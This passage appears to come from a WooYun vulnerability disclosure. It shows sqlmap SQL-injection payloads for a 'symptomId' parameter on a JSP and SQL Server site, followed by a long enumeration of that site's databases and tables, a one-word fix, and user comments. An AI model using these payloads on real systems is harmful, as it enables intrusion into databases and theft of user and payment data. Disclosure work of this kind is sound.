Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
current database: 'Mall_Master'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: symptomId (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: symptomId=2 AND 2383=2383
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: symptomId=2;WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: symptomId=2 WAITFOR DELAY '0:0:5'--
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: symptomId=2 UNION ALL SELECT NULL,CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+CHAR(73)+CHAR(121)+CHAR(79)+CHAR(98)+CHAR(70)+CHAR(113)+CHAR(66)+CHAR(114)+CHAR(101)+CHAR(68)+CHAR(113)+CHAR(75)+CHAR(79)+CHAR(114)+CHAR(90)+CHAR(108)+CHAR(108)+CHAR(109)+CHAR(84)+CHAR(107)+CHAR(77)+CHAR(69)+CHAR(90)+CHAR(114)+CHAR(75)+CHAR(111)+CHAR(104)+CHAR(101)+CHAR(111)+CHAR(97)+CHAR(113)+CHAR(108)+CHAR(98)+CHAR(111)+CHAR(97)+CHAR(67)+CHAR(66)+CHAR(87)+CHAR(115)+CHAR(67)+CHAR(113)+CHAR(107)+CHAR(113)+CHAR(98)+CHAR(113)-- -
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2008
Database: BlacklistSMS
[1 table]
+-----------------------------------------------------------+
| black_listSMS |
+-----------------------------------------------------------+
Database: tempdb
[28 tables]
+-----------------------------------------------------------+
| MSdistributor_access |
| #0C66AE13 |
| #10373EF7 |
| #1407CFDB |
| #17D860BF |
| #18CC84F8 |
| #1C9D15DC |
| #1D913A15 |
| #1E855E4E |
| #1F798287 |
| #206DA6C0 |
| #2161CAF9 |
| #280EC888 |
| #2902ECC1 |
| #29F710FA |
| #2DC7A1DE |
| #306F045F |
| #319832C2 |
| #3568C3A6 |
| #365CE7DF |
| #37510C18 |
| #38453051 |
| #3939548A |
| #3A2D78C3 |
| #3B219CFC |
| #3D09E56E |
| #3DFE09A7 |
| #57BDDBAA |
+-----------------------------------------------------------+
Database: UnionManage
[29 tables]
+-----------------------------------------------------------+
| AccountsReport |
| ActionGroup |
| ActionInfo |
| AdvertInfo |
| AdvertPicTable |
| AdvertSize |
| AdvertiseInfo |
| BackgroundMenu |
| ClickRegister |
| Commission |
| CommissionLog |
| FileStore |
| FirstGrade |
| ImageTable |
| IncomeReport |
| LoginLog |
| MessageInfo |
| NetworkType |
| OrderNums |
| OrderProductrStatistics |
| OrderStatistics |
| PushLog |
| RoleAction |
| SecondGrade |
| SysLog |
| SysRoles |
| SysUser |
| UserBank |
| UserInfo |
+-----------------------------------------------------------+
Database: TextTagDB
[4 tables]
+-----------------------------------------------------------+
| CategoryTagRelation |
| TagCategories |
| TagTypes |
| TextTags |
+-----------------------------------------------------------+
Database: Mall_APPSMS
[6 tables]
+-----------------------------------------------------------+
| TB_STATUSRPT |
| sysdiagrams |
| tb_control |
| tb_history |
| tb_queue |
| tb_ums |
+-----------------------------------------------------------+
Database: msdb
[227 tables]
+-----------------------------------------------------------+
| MSagent_parameters |
| MSagent_profiles |
| MSagentparameterlist |
| MSdatatype_mappings |
| MSdbms |
| MSdbms_datatype |
| MSdbms_datatype_mapping |
| MSdbms_map |
| MSdistpublishers |
| MSdistributiondbs |
| MSdistributor |
| MSreplmonthresholdmetrics |
| backupfile |
| backupfilegroup |
| backupmediafamily |
| backupmediaset |
| backupset |
| log_shipping_monitor_alert |
| log_shipping_monitor_error_detail |
| log_shipping_monitor_history_detail |
| log_shipping_monitor_primary |
| log_shipping_monitor_secondary |
| log_shipping_primaries |
| log_shipping_primary_databases |
| log_shipping_primary_secondaries |
| log_shipping_secondaries |
| log_shipping_secondary |
| log_shipping_secondary_databases |
| logmarkhistory |
| restorefile |
| restorefilegroup |
| restorehistory |
| sqlagent_info |
| suspect_pages |
| sysalerts |
| syscachedcredentials |
| syscategories |
| syscollector_blobs_internal |
| syscollector_collection_items |
| syscollector_collection_items_internal |
| syscollector_collection_sets |
| syscollector_collection_sets_internal |
| syscollector_collector_types |
| syscollector_collector_types_internal |
| syscollector_config_store |
| syscollector_config_store_internal |
| syscollector_execution_log |
| syscollector_execution_log_full |
| syscollector_execution_log_internal |
| syscollector_execution_stats |
| syscollector_execution_stats_internal |
| syscollector_tsql_query_collector |
| sysdac_history_internal |
| sysdac_instances |
| sysdac_instances_internal |
| sysdatatypemappings |
| sysdbmaintplan_databases |
| sysdbmaintplan_history |
| sysdbmaintplan_jobs |
| sysdbmaintplans |
| sysdownloadlist |
| sysdtscategories |
| sysdtspackagelog |
| sysdtspackages |
| sysdtssteplog |
| sysdtstasklog |
| sysjobactivity |
| sysjobhistory |
| sysjobs |
| sysjobs_view |
| sysjobschedules |
| sysjobservers |
| sysjobsteps |
| sysjobstepslogs |
| sysmail_account |
| sysmail_allitems |
| sysmail_attachments |
| sysmail_attachments_transfer |
| sysmail_configuration |
| sysmail_event_log |
| sysmail_faileditems |
| sysmail_log |
| sysmail_mailattachments |
| sysmail_mailitems |
| sysmail_principalprofile |
| sysmail_profile |
| sysmail_profileaccount |
| sysmail_query_transfer |
| sysmail_send_retries |
| sysmail_sentitems |
| sysmail_server |
| sysmail_servertype |
| sysmail_unsentitems |
| sysmaintplan_log |
| sysmaintplan_logdetail |
| sysmaintplan_plans |
| sysmaintplan_subplans |
| sysmanagement_shared_registered_servers |
| sysmanagement_shared_registered_servers_internal |
| sysmanagement_shared_server_groups |
| sysmanagement_shared_server_groups_internal |
| sysnotifications |
| sysoperators |
| sysoriginatingservers |
| sysoriginatingservers_view |
| syspolicy_conditions |
| syspolicy_conditions_internal |
| syspolicy_configuration |
| syspolicy_configuration_internal |
| syspolicy_execution_internal |
| syspolicy_facet_events |
| syspolicy_management_facets |
| syspolicy_object_sets |
| syspolicy_object_sets_internal |
| syspolicy_policies |
| syspolicy_policies_internal |
| syspolicy_policy_categories |
| syspolicy_policy_categories_internal |
| syspolicy_policy_category_subscriptions |
| syspolicy_policy_category_subscriptions_internal |
| syspolicy_policy_execution_history |
| syspolicy_policy_execution_history_details |
| syspolicy_policy_execution_history_details_internal |
| syspolicy_policy_execution_history_internal |
| syspolicy_system_health_state |
| syspolicy_system_health_state_internal |
| syspolicy_target_set_levels |
| syspolicy_target_set_levels_internal |
| syspolicy_target_sets |
| syspolicy_target_sets_internal |
| sysproxies |
| sysproxylogin |
| sysproxyloginsubsystem_view |
| sysproxysubsystem |
| sysreplicationalerts |
| sysschedules |
| sysschedules_localserver_view |
| syssessions |
| sysssislog |
| sysssispackagefolders |
| sysssispackages |
| syssubsystems |
| systargetservergroupmembers |
| systargetservergroups |
| systargetservers |
| systargetservers_view |
| systaskids |
| sysutility_mi_configuration |
| sysutility_mi_configuration_internal |
| sysutility_mi_cpu_stage_internal |
| sysutility_mi_dac_execution_statistics_internal |
| sysutility_mi_session_statistics_internal |
| sysutility_mi_smo_objects_to_collect_internal |
| sysutility_mi_smo_properties_to_collect_internal |
| sysutility_mi_smo_stage_internal |
| sysutility_mi_volumes_stage_internal |
| sysutility_ucp_aggregated_dac_health |
| sysutility_ucp_aggregated_dac_health_internal |
| sysutility_ucp_aggregated_mi_health |
| sysutility_ucp_aggregated_mi_health_internal |
| sysutility_ucp_computer_cpu_health |
| sysutility_ucp_computer_cpu_health_internal |
| sysutility_ucp_computer_cpu_utilization |
| sysutility_ucp_computer_cpu_utilizations |
| sysutility_ucp_computer_policies |
| sysutility_ucp_computers |
| sysutility_ucp_computers_stub |
| sysutility_ucp_configuration |
| sysutility_ucp_configuration_internal |
| sysutility_ucp_cpu_utilization_stub |
| sysutility_ucp_dac_cpu_utilization |
| sysutility_ucp_dac_cpu_utilizations |
| sysutility_ucp_dac_database_file_space_health |
| sysutility_ucp_dac_database_file_space_utilizations |
| sysutility_ucp_dac_file_space_health_internal |
| sysutility_ucp_dac_health |
| sysutility_ucp_dac_health_internal |
| sysutility_ucp_dac_policies |
| sysutility_ucp_dac_policy_type |
| sysutility_ucp_dac_volume_space_utilizations |
| sysutility_ucp_dacs_stub |
| sysutility_ucp_database_files |
| sysutility_ucp_databases |
| sysutility_ucp_databases_stub |
| sysutility_ucp_datafiles |
| sysutility_ucp_datafiles_stub |
| sysutility_ucp_deployed_dacs |
| sysutility_ucp_filegroups |
| sysutility_ucp_filegroups_stub |
| sysutility_ucp_filegroups_with_policy_violations_internal |
| sysutility_ucp_health_policies_internal |
| sysutility_ucp_instance_cpu_utilization |
| sysutility_ucp_instance_policies |
| sysutility_ucp_instance_policy_type |
| sysutility_ucp_instances |
| sysutility_ucp_logfiles |
| sysutility_ucp_logfiles_stub |
| sysutility_ucp_managed_instances |
| sysutility_ucp_managed_instances_internal |
| sysutility_ucp_mi_cpu_utilizations |
| sysutility_ucp_mi_database_file_space_utilizations |
| sysutility_ucp_mi_database_health |
| sysutility_ucp_mi_database_health_internal |
| sysutility_ucp_mi_file_space_health |
| sysutility_ucp_mi_file_space_health_internal |
| sysutility_ucp_mi_health |
| sysutility_ucp_mi_health_internal |
| sysutility_ucp_mi_volume_space_health |
| sysutility_ucp_mi_volume_space_health_internal |
| sysutility_ucp_mi_volume_space_utilizations |
| sysutility_ucp_policies |
| sysutility_ucp_policy_check_conditions |
| sysutility_ucp_policy_check_conditions_internal |
| sysutility_ucp_policy_configuration |
| sysutility_ucp_policy_target_conditions |
| sysutility_ucp_policy_target_conditions_internal |
| sysutility_ucp_policy_violations |
| sysutility_ucp_policy_violations_internal |
| sysutility_ucp_processing_state_internal |
| sysutility_ucp_smo_servers_stub |
| sysutility_ucp_snapshot_partitions_internal |
| sysutility_ucp_space_utilization_stub |
| sysutility_ucp_supported_object_types_internal |
| sysutility_ucp_utility_space_utilization |
| sysutility_ucp_volume_powershell_path |
| sysutility_ucp_volumes |
| sysutility_ucp_volumes_stub |
+-----------------------------------------------------------+
Database: union_AppServer
[12 tables]
+-----------------------------------------------------------+
| AD |
| ADBan |
| ADNetShow |
| ADP |
| ADSize |
| ADValidate |
| DisplayMode |
| IP24Check |
| IPAddr |
| Project |
| WebDomain |
| vAD_ADP |
+-----------------------------------------------------------+
Database: Mall_Slave
[16 tables]
+-----------------------------------------------------------+
| TOP_ProductType |
| TOP_UpdateProductType |
| TOP_UpdateProducts |
| TOP_products |
| V_Attributes |
| attr_data |
| comment_detail |
| comment_reply |
| comment_vote |
| order_info |
| order_items |
| product |
| product_attr |
| product_comment |
| product_type |
| product_whole |
+-----------------------------------------------------------+
Database: user_mobile
[1 table]
+-----------------------------------------------------------+
| order_mobile |
+-----------------------------------------------------------+
Database: Mall_MobileMessage
[5 tables]
+-----------------------------------------------------------+
| MobileMessage |
| MobileMessageHistory |
| 列表$ |
| c |
| mmm |
+-----------------------------------------------------------+
Database: KXR_AD_ManageSystem
[10 tables]
+-----------------------------------------------------------+
| AdPlace_AdInstance_Order |
| Ad_Block |
| Ad_Instance |
| Ad_InstanceBak |
| Ad_Page |
| Ad_Place |
| DefaultAd_Instance |
| V_AdPlaceList |
| V_PageBlockPlace |
| sysdiagrams |
+-----------------------------------------------------------+
Database: union_CoreServer
[48 tables]
+-----------------------------------------------------------+
| AD |
| ADBan |
| ADNetShow |
| ADP |
| ADSize |
| ADValidate |
| AccountRefresh |
| Admin |
| AdminGroup |
| Adv |
| Article |
| Config |
| ConsumeLog |
| D99_CMD |
| D99_REG |
| D99_Tmp |
| DisplayMode |
| Log |
| MSpeer_lsns |
| MSpeer_originatorid_history |
| Payment |
| Prizes |
| PrizesApplication |
| Project |
| Server |
| ServerLog |
| Sort |
| StatADDay |
| Tag |
| Web |
| WebDomain |
| cmd |
| d_Tmp |
| dirsa |
| foofoofoo |
| vADBan |
| vADValidate |
| vAD_ADP |
| vAD_Project |
| vAdmin |
| vArticle |
| vConsume_Adv |
| vConsume_Web |
| vPayment |
| vPrizes |
| vProject |
| vProject_ADNetShow |
| vWebDomain |
+-----------------------------------------------------------+
Database: CallTel
[2 tables]
+-----------------------------------------------------------+
| CallStatistics |
| CallTel |
+-----------------------------------------------------------+
Database: kxinfo
[13 tables]
+-----------------------------------------------------------+
| Article2TagIds |
| ArticleTags |
| Articles |
| ImageInfos |
| Keywords |
| LoginHistories |
| OperationHistories |
| RightsGroup2Roless |
| RightsGroups |
| RoleGroups |
| Roles |
| SimilarTags |
| Users |
+-----------------------------------------------------------+
Database: master
[361 tables]
+-----------------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS

修复方案:

过滤

版权声明:转载请注明来源 Xenon@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)


漏洞评价:

评价

  1. 2016-04-07 15:54 | 态度看世界 ( 路人 | Rank:2 漏洞数:1 | 利益我可以把它做到更大)

    你好可以交个朋友,

  2. 2016-04-07 16:30 | Pzacker ( 实习白帽子 | Rank:82 漏洞数:32 )

    我也是这么想的 ~

  3. 2016-04-08 19:25 | 态度看世界 ( 路人 | Rank:2 漏洞数:1 | 利益我可以把它做到更大)

    @Pzacker 能加好友吗 ?

  4. 2016-04-08 19:28 | Pzacker ( 实习白帽子 | Rank:82 漏洞数:32 )

    @态度看世界 加QQ 私信

  5. 2016-04-11 12:33 | V5shop(乌云厂商)

    这个逼我给你满分,现在点不行咯

  6. 2016-04-11 12:34 | 菜菜 ( 实习白帽子 | Rank:83 漏洞数:7 | cnidc.hk:500:D5B9985DFBA5FE8A050A39C249C...)

    楼上厂商是我小号

  7. 2016-04-11 13:33 | Xenon ( 普通白帽子 | Rank:119 漏洞数:42 | 爱XXOO真是太好了)

    @V5shop 厂商都来我这玩耍了,QAQ

  8. 2016-04-11 20:16 | 态度看世界 ( 路人 | Rank:2 漏洞数:1 | 利益我可以把它做到更大)

    @Pzacker:673383850,技术交流